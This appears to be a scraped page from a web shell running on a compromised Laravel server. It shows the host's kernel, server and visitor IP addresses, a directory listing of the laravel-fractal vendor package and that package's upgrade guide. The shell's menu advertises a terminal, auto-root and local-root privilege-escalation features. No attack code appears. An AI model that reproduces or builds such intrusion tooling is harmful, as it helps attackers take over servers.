Linux unitednationsplay.com 3.10.0-1160.45.1.el7.x86_64 #1 SMP Wed Oct 13 17:20:51 UTC 2021 x86_64
nginx/1.20.1
Server IP : 188.130.139.92 & Your IP : 3.22.120.195
Domains :
Cant Read [ /etc/named.conf ]
User : web
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
home /
www /
1 /
vendor /
spatie /
laravel-fractal /
Delete
Unzip
Name
Size
Permission
Date
Action
.github
[ DIR ]
drwxr-xr-x
2021-02-02 18:21
config
[ DIR ]
drwxr-xr-x
2021-02-02 18:21
src
[ DIR ]
drwxr-xr-x
2021-02-02 18:21
.editorconfig
312
B
-rw-r--r--
2021-02-02 18:21
.php_cs.cache
2.11
KB
-rw-r--r--
2021-02-02 18:21
.php_cs.dist
1.17
KB
-rw-r--r--
2021-02-02 18:21
CHANGELOG.md
4.21
KB
-rw-r--r--
2021-02-02 18:21
LICENSE.md
1.06
KB
-rw-r--r--
2021-02-02 18:21
README.md
8.31
KB
-rw-r--r--
2021-02-02 18:21
UPGRADE.md
524
B
-rw-r--r--
2021-02-02 18:21
composer.json
1.49
KB
-rw-r--r--
2021-02-02 18:21
Save
Rename
# Upgrade guide ## From v4 to v5 If you have a configuration file named `laravel-fractal.php`, rename it to `fractal.php` for it to still be used. ## From v3 to v4 v2 has mainly been made to provide compatibility with fractal 0.16 through fractalistic 2. In that version of Fractal your transformers, includes and excludes should return an array. String, ints, bools and such are not allowed anymore. If all your transformers follow that rule you should be able to upgrade to v2 without any modifications to your code.